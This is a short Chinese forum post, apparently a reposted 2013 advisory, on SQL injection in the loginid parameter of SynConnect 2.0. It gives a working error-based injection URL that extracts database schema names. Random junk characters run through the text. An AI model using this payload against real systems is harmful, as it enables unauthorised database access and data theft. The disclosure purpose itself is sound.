SynConnect中的loginid参数中存在SQL注入漏洞,该漏洞源于程序使用SQL查询之前没有充分验证用户提供的输入。攻击者利用该漏洞操控应用程序,访问或修改数据,或利用底层数据库中潜在的漏洞。SynConnect 2.0版本中存在漏洞,其他版本也可能受到影响。1 q) ^; ]+ s: H v4 ?+ @+ [0 C+ b
" ~: G9 W* b6 t( W目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
- e- d' X( @- Z. y* e- ^http://www.synchroweb.com/prod_syn.php+ u! V. v- }/ `- N& b+ x
4 X3 E5 h. q: z
EXP:8 G M( W- o+ `6 I8 T0 d! t
, j9 @: m: e6 c1 Phttp://localhost/index.php?func=logoff&loginid=1011′ AND (SELECT 8975 FROM(SELECT COUNT(*),CONCAT((SELECT MID((IFNULL(CAST(schema_name AS CHAR),0×20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘bhdresh’=’bhdresh0 R+ q9 G) y7 h! o' S& n6 J
0 d+ T& S! u% P' s4 i% } |
发表于 2013-4-4 17:35:25
收藏
支持
反对